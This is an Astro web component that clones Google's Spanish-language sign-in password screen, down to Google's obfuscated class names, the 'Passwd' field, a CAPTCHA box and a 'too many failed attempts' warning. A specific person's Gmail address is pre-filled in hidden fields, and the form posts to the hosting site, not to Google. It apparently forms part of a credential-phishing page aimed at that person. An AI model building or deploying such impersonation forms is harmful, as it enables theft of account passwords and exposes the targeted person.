---
interface Props {
    id?: string;
    class?: string;
}

const { id, class: className } = Astro.props;
---

<form method="post" id={id} class:list={[className]}>
    <span>
        <section class="Em2Ord PsAlOe rNe0id eLNT1d S7S4N" aria-hidden="true" aria-live="assertive" aria-atomic="true">
            <header class="vYeFie">
                <div class="ozEFYb" role="presentation">
                    <h2 class="x9zgF TrZEUc">
                        <span class="CuWxc" aria-hidden="true">
                            <svg aria-hidden="true" class="Qk3oof C3qbwe" fill="currentColor" focusable="false" width="20px" height="20px" viewBox="0 0 24 24" xmlns="https://www.w3.org/2000/svg">
                                <path d="M1 21h22L12 2 1 21zm12-3h-2v-2h2v2zm0-4h-2v-4h2v4z"></path>
                            </svg>
                        </span>
                        <span>Se han producido demasiados intentos fallidos</span>
                    </h2>
                    <div class="osxBFb" aria-hidden="true"></div>
                </div>
            </header>
            <div class="yTaH4c">
                <div></div>
            </div>
        </section>
        <section class="Em2Ord ">
            <header class="vYeFie" aria-hidden="true"></header>
            <div class="yTaH4c">
                <div>
                    <input type="email" name="identifier" class="Hvu6D" tabindex="-1" aria-hidden="true" spellcheck="false" value="maizogabriel@gmail.com" autocomplete="off" id="hiddenEmail">
                    <div class="njnYzb NhPs4c">
                        <div class="YqLCIe">
                            <div class="El1b7b">
                                <div class="klRug">
                                    <div class="H2p7Gf">
                                        <div id="password" class="rFrNMe i79UJc zKHdkd sdJrJc">
                                            <div class="aCsJod oJeWuf">
                                                <div class="aXBtI Wic03c">
                                                    <div class="Xb9hP">
                                                        <input type="password" class="whsOnd zHQkBf" autocomplete="current-password" spellcheck="false" tabindex="0" aria-label="Introduce tu contraseña" name="Passwd" aria-disabled="false" autocapitalize="off">
                                                        <div class="AxOyFc snByac" aria-hidden="true">Introduce tu contraseña</div>
                                                    </div>
                                                    <div class="i9lrp mIZh1c"></div>
                                                    <div class="OabDMe cXrdqd Y2Zypf"></div>
                                                </div>
                                            </div>
                                            <div class="LXRPh">
                                                <div class="ovnfwe Is7Fhb"></div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <div class="Ly8vae uSvLId" aria-live="polite"></div>
                        <div class="v8aRxf">
                            <div class="myYH1 g9Mx QkTfte">
                                <div class="Hy62Fc">
                                    <div class="sfqPrd rBUW7e">
                                        <div class="QTJzre NEk0Ve">
                                            <div class="uxXgMe">
                                                <div class="VfPpkd-dgl2Hf-ppHlrf-sM5MNb">
                                                    <div class="VfPpkd-MPu53c VfPpkd-MPu53c-OWXEXe-dgl2Hf Ne8lhe swXlm az2ine lezCeb kAVONc VfPpkd-MPu53c-OWXEXe-mWPk3d">
                                                        <input class="VfPpkd-muHVFf-bMcfAe" type="checkbox" aria-labelledby="selectioni7">
                                                        <div class="VfPpkd-YQoJzd">
                                                            <svg aria-hidden="true" class="VfPpkd-HUofsb" viewBox="0 0 24 24">
                                                                <path class="VfPpkd-HUofsb-Jt5cK" fill="none" d="M1.73,12.91 8.1,19.28 22.79,4.59"></path>
                                                            </svg>
                                                            <div class="VfPpkd-SJnn3d"></div>
                                                        </div>
                                                        <div class="VfPpkd-OYHm6b"></div>
                                                        <div class="VfPpkd-sMek6-LhBDec"></div>
                                                    </div>
                                                </div>
                                            </div>
                                            <div class="gyrWGe">
                                                <div class="jOkGjb">
                                                    <div id="selectioni7" class="dJVBl wIAG6d">Mostrar contraseña</div>
                                                </div>
                                                <div class="RAvnDd">
                                                    <div class="dJVBl wIAG6d"></div>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                <div aria-atomic="true" aria-live="polite" class="O6yUcb">
                                    <div></div>
                                </div>
                            </div>
                        </div>
                        <div class="NdBX9e"></div>
                    </div>
                    <input type="hidden" name="TrustDevice" value="true">
                    <div class="lbFS4d eLNT1d">
                        <div class="AFTWye ">
                            <div class="rFrNMe X3mtXb UOsO2 zKHdkd sdJrJc Tyc9J">
                                <div class="aCsJod oJeWuf">
                                    <div class="aXBtI Wic03c">
                                        <div class="Xb9hP">
                                            <input type="text" class="whsOnd zHQkBf" autocomplete="off" spellcheck="false" tabindex="0" aria-label="Escribe el texto que escuches o veas" name="ca" aria-disabled="false" id="ca" dir="ltr">
                                            <div class="AxOyFc snByac" aria-hidden="true">Escribe el texto que escuches o veas</div>
                                        </div>
                                        <div class="i9lrp mIZh1c"></div>
                                        <div class="OabDMe cXrdqd"></div>
                                    </div>
                                </div>
                                <div class="LXRPh">
                                    <div class="ovnfwe Is7Fhb"></div>
                                    <div class="dEOOab RxsGPe" aria-atomic="true" aria-live="assertive"></div>
                                </div>
                            </div>
                        </div>
                        <input type="hidden" name="ct" id="ct">
                    </div>
                    <c-wiz jsmodel="hc6Ubd">
                        <c-data id="i9"></c-data>
                    </c-wiz>
                </div>
            </div>
        </section>
        <input type="hidden" value="maizogabriel@gmail.com" id="identifierId">
    </span>
</form>
